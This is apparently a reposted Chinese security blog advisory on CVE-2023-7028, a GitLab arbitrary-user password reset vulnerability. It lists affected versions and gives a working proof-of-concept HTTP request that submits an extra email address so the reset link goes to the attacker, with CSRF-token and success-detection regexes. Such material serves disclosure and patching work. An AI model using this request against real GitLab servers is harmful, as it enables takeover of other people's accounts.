结论:
指尖好久不更新漏洞相关文章了,看大家都在发,跟个风。
先说结论:需要知道正确的Email(可配合其它历史漏洞获得),危害有限。
漏洞描述:
2024年1月11日,Gitlab官方披露CVE-2023-7028 GitLab 任意用户密码重置漏洞,官方评级严重。攻击者可利用忘记密码功能,构造恶意请求获取密码重置链接从而重置密码。
影响范围:
-
16.1 <= Gitlab < 16.1.6
-
16.2 <= Gitlab < 16.2.9
-
16.3 <= Gitlab < 16.3.7
-
16.4 <= Gitlab < 16.4.5
-
16.5 <= Gitlab < 16.5.6
-
16.6 <= Gitlab < 16.6.4
-
16.7 <= Gitlab < 16.7.2
POC:
POST /users/password HTTP/1.1
Host: 127.0.0.1
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/users/password/new
utf8=%E2%9C%93&authenticity_token=FTrmXyR%2FlOn8sxS4ZDVxLaLP20Fjx8fen7LatJOmuaoXClS8DtT6Uskb2uqUNrAHGaFAqmnEVQjx5Go3%2BV1tlA%3D%3D&user[email][]=正确的邮箱&user[email][]=大佬的邮箱
复现:
1、访问target+/users/password/new,输入邮箱,重置!拦截请求修改请求体中的user[mail]xxx
<meta name="csrf-token" content="([^"]+)" /> //正则提取csrf-token
2、构造并发送POC中的请求,如果响应体中出现以下正则内容,查看邮箱收信即可。
`如果您的邮箱存在|If your email address exists` //响应检测正则
来源:https://twitter.com/rwincey/status/1745659710089437368
原文始发于微信公众号(指尖安全):GitLab任意用户密码重置漏洞(CVE-2023-7028)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论